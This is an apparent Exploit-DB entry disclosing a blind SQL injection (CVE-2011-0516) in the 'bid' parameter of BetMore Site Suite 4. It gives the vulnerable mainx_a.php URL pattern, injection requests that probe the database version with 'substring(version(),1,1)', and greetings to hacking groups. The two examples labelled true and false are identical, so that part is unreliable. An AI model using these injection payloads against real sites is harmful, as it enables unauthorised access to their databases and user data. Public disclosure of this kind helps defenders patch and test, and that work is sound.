BetMore Site Suite 4 - 'bid' Blind SQL Injection

Author: h4ck3r
type: webapps
platform: php
port: 
date_added: 2011-01-16  
date_updated: 2011-01-16  
verified: 0  
codes: CVE-2011-0516;OSVDB-70492  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 15999.txt  

==
[#] Script: BetMore Site Suite
[#] Version: 4
[#] Link: http://products.epromptc.com/betmore/?pt=4&rfid=55
==
[#] Author: BorN To K!LL - h4ck3r
[#] Contact: SQL@hotmail.co.uk
==
[#] 3xploit:

/mainx_a.php?lngx=[true-value]&x=[true-value]&xid=[true-value]&bid=[Blind-Injection]
==
[#] 3xample:

/mainx_a.php?lngx=12&x=367&xid=2&bid=78222 and substring(version(),1,1)=4    // False ,,
/mainx_a.php?lngx=12&x=367&xid=2&bid=78222 and substring(version(),1,1)=4    // True ,,
==
[#] Greetings:
darkc0de's team , AsbMay's Group , w4ck1ng team , Q8 , and all muslims ..
==